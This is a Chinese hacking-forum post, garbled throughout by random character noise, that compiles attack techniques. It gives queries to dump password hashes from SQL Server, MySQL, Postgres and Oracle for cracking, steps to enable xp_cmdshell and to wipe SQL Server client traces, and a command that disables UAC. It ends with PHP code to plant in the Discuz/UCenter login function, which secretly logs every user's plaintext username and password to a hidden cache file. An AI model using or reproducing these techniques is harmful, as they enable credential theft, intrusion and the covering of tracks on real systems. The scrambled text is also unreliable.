5 I$ C4 G8 @; i6 K7 `; x+ r+ `' n% m' U
各种类型数据库抓HASH破解最高权限密码!
0 T) C g6 n9 P, Z1.sql server2000
2 u; g U* h4 S* s9 l! F0 zSELECT password from master.dbo.sysxlogins where name='sa'4 j: V2 S+ k7 x+ U+ P w. d2 l; i4 i4 ~
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
3 G, m: c q9 D( G2FD54D6119FFF04129A1D72E7C3194F7284A7F3A+ M# j* Q4 J( }4 D' }' I6 a
( {# g6 P- w) X* A; L/ M# ~, p" C0×0100- constant header4 v7 ^# Y3 M& W2 i. R
34767D5C- salt
1 {! q; v [4 J8 `8 `$ F0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
: N0 r" h: d/ W) b2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash9 ]* `! n6 g* c- v8 O+ v0 [7 {
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
$ P' E- F3 g" _( H- c! q$ q1 XSQL server 2005:-. x7 e; D. I& ~7 Z% f9 d
SELECT password_hash FROM sys.sql_logins where name='sa'; l, B* Q7 v9 F' Z5 G
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
; P5 z9 A; c6 s/ r0 P0 Y: t0×0100- constant header
4 e* y, U1 X: _8 D2 n+ f7 ?7 w993BF231-salt% l3 U7 @9 h0 }2 ~5 ~ D
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash3 F5 ]) v/ u, t/ V2 P' {
crack case sensitive hash in cain, try brute force and dictionary based attacks.3 x# L9 Q8 W) G5 M# j- t
+ L Y' C+ a$ K8 o8 E; J
update:- following bernardo’s comments:-( O: d0 \: h5 S
use function fn_varbintohexstr() to cast password in a hex string.
) i7 \6 }' B) Z3 w# }8 k9 L1 X. ve.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins6 p0 \9 Y" r& f: m2 J
4 l2 J) v/ L9 zMYSQL:-
- G6 f5 Y! x( j L# [7 N1 j/ L
" e0 ]4 S: j# L7 M+ u; d/ D4 aIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
Y5 p" t9 ?% J: F' [# `
* ^/ @& v" C N! ^1 p*mysql < 4.1, o Q( V4 B ?/ v3 i
) U6 U* o" X) D6 @0 D7 |
mysql> SELECT PASSWORD(‘mypass’); h0 v i' c( }
+——————–+, E# g" b+ x) d9 f8 o
| PASSWORD(‘mypass’) |
0 `/ m; ], K* [" | \8 l Y2 Z' I9 b+——————–+
4 J) E' k' L- I, y+ ^0 i8 U| 6f8c114b58f2ce9e |
# w; {% t$ s I+——————–+
8 o, f9 s5 f' A
7 J0 u+ H* _' g*mysql >=4.1
; F2 Z3 m! m! ]+ j+ |0 {' K
5 C- w( M6 A# {/ g& ^; }5 tmysql> SELECT PASSWORD(‘mypass’);: n8 h1 W; g3 g2 g& b% i' u
+——————————————-+
% u ~6 b J0 n| PASSWORD(‘mypass’) |
' o* z n9 J, P9 W l+——————————————-+% f2 D) u% \0 y7 Q
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |8 \$ [1 I' }7 Z- N& Y
+——————————————-+
5 u. C8 N1 l( a: w) T; `; M! L, z1 C2 ~+ `
Select user, password from mysql.user g: V- Z8 `! H. f5 ]3 h0 M! n
The hashes can be cracked in ‘cain and abel’5 e( T/ H! u1 ?
! A* D0 P. K! m& c
Postgres:-3 l* }; U4 ?+ m+ J, s1 I( F5 J3 \
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)' Z1 c6 \' l4 \! |: L' J3 ~
select usename, passwd from pg_shadow;
1 c$ r5 y# o) @. z2 C# C( e/ ^usename | passwd2 V. ?* N. o( \: h: k
——————+————————————-
& o% n, D. x6 i6 b4 q, Z- itestuser | md5fabb6d7172aadfda4753bf0507ed4396
5 y1 w* x3 u; C+ s7 q& p) Duse mdcrack to crack these hashes:-
2 @9 g/ C$ o) ?6 \4 U0 |% b) M$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396% i$ X; @. }7 \4 g+ T9 ?' ]3 o
* U! i+ O5 h* S6 i3 Z( I
Oracle:-
" R' N, L. f; | n4 oselect name, password, spare4 from sys.user$
8 y. n! N( W; X2 nhashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
3 v) o2 `5 R7 i0 S4 vMore on Oracle later, i am a bit bored….
$ _$ |& f3 Q) H7 ]; s0 U4 w3 j# y+ W+ k- a/ l0 p
5 k) _8 A m! [- s( J在sql server2005/2008中开启xp_cmdshell2 Z; w2 O' J n2 [ [, l
-- To allow advanced options to be changed.! P" r/ Z+ p# c
EXEC sp_configure 'show advanced options', 1) k/ d1 \. ?) K, q0 u ]: o
GO
7 m8 o' @; |4 ]( [, F-- To update the currently configured value for advanced options.
2 ^* W" D4 ~) S% s% |3 a' w. oRECONFIGURE' O% A' Y7 r( t6 Z* ^. F
GO. x) r- h- ^5 [6 o/ ~
-- To enable the feature.9 \6 U2 \8 _7 y( m& t6 i% p
EXEC sp_configure 'xp_cmdshell', 1
2 L1 C8 e- S2 m& oGO& q: |8 E* e0 d% F s
-- To update the currently configured value for this feature.% C" k4 I9 H6 i9 X# F$ f" A' }9 \
RECONFIGURE' ?" v# B1 s1 {0 k/ `& R
GO; h) P1 ^& E( \7 _' m. S" @ r' B
SQL 2008 server日志清除,在清楚前一定要备份。" _2 J6 p' c( A9 B5 w3 S8 ?
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:3 g* @3 O2 z3 G# m9 k
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
( ^% @& |# t6 [1 ?0 c/ |5 @1 y8 Q3 _+ _: M. t$ Z! _
对于SQL Server 2008以前的版本:
$ J+ j# {4 k7 F# H7 n9 BSQL Server 2005:
+ y! y8 |( U+ D3 P删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
8 A1 _6 K! y9 |. b# B8 n& ISQL Server 2000:( _& y& n1 x" R, B& S3 [
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。( c2 L4 x1 S5 k* B8 A+ _
( V* U! C3 o6 b0 Y本帖最后由 simeon 于 2013-1-3 09:51 编辑- F" C x+ P# c9 L! E
3 E7 X" o6 A; v9 g' `; \2 T
( \* `- F$ k$ m3 ~$ j9 iwindows 2008 文件权限修改! r2 b9 Q8 x V
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx( ?' X( N ]5 Y% G: T% K1 e+ v
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
( V1 ~3 b" S( }一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
/ A! p- T& C, i! g1 g
( h2 o# ~0 j& j4 AWindows Registry Editor Version 5.008 e3 N5 w- n0 ?$ @$ U4 Z7 N' q
[HKEY_CLASSES_ROOT\*\shell\runas]
2 C$ C2 a' m1 G Q4 u+ \' P* z@="管理员取得所有权"5 i# W& n7 u: n5 H: |: ?
"NoWorkingDirectory"=""
0 S9 v; l; Z+ x) T[HKEY_CLASSES_ROOT\*\shell\runas\command]5 }' j5 [8 Y$ t( W) `# b
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
3 x1 |. _* u* B0 F0 E8 {1 x"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
+ P! ^! \& t: e3 C$ ?- k[HKEY_CLASSES_ROOT\exefile\shell\runas2]
/ G7 M6 v) |: \# F7 x@="管理员取得所有权"9 Z) F6 m3 h6 `' f! C; [+ o- N
"NoWorkingDirectory"=""9 u# q ?) v; s, t" i
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
8 h) v, }( r% g. y* W. _6 {@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
( J+ h# U8 d' L0 O f"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
% J9 }% N5 {1 @$ V& m" U* S( {/ C5 ^; m
[HKEY_CLASSES_ROOT\Directory\shell\runas]
2 j+ F" e, z6 p6 R@="管理员取得所有权"" i1 w0 G }# ?0 ?
"NoWorkingDirectory"=""
* W. `$ o. R5 P; M2 E[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
6 b5 g9 h6 D6 i8 N0 ~* E@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
$ p- b; e+ z& c/ K"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
2 |1 ~% q+ |/ {% l6 l. t
- G) R( B& n/ L+ ]: W* h- V4 r
9 f# d3 j1 k+ B; ~win7右键“管理员取得所有权”.reg导入- z w& t, R s6 ?
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,% L; Q4 G( R% l8 w! @
1、C:\Windows这个路径的“notepad.exe”不需要替换 m% q g5 }$ U% d' z
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
/ f7 x5 ]& C8 ^6 h0 [) z3、四个“notepad.exe.mui”不要管
% J2 U$ r/ M, g5 Q4 p4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
0 a& _& d2 K6 k1 I( A3 vC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”* ]: l4 g" k+ t/ m/ s! \$ K5 ^9 s
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,( e# z( }$ M7 A( a+ }6 d6 Y
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。! w0 k1 i: M$ P1 s* u/ c# Z" {
windows 2008中关闭安全策略:
" Q; o( I* @2 t' j% ireg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
% C3 L- c' o4 f修改uc_client目录下的client.php 在
* @4 k+ O' Q6 L9 s$ kfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {/ S7 ?9 \/ t0 y) N; |' N! S F
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
) E( [5 i6 L5 }8 M" d你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw% c& _$ I* z' z$ O* K9 W' V$ p
if(getenv('HTTP_CLIENT_IP')) {
: \0 i h. c$ T$ s$ t% e$onlineip = getenv('HTTP_CLIENT_IP');
1 Y2 H8 W8 t! O$ h! v} elseif(getenv('HTTP_X_FORWARDED_FOR')) { x5 Y+ f) h1 U/ k: k" w5 }5 D( Z
$onlineip = getenv('HTTP_X_FORWARDED_FOR');! Z. Y% `& n8 E2 D: f, S
} elseif(getenv('REMOTE_ADDR')) {2 e- m. P+ i' F) D" F5 H1 p
$onlineip = getenv('REMOTE_ADDR');
6 l! [( C/ s! J2 Q9 A} else {
$ p+ h a+ J7 |! l3 C+ u$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
* t- P% o% R7 h+ I}
* Q1 v& b1 i8 h) ]8 l n- u $showtime=date("Y-m-d H:i:s");
3 c8 [8 x/ @. u o $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";5 i. \; B# v& a- I" k9 u! y
$handle=fopen('./data/cache/csslog.php','a+');
( f3 \* X/ z/ \4 p, s $write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对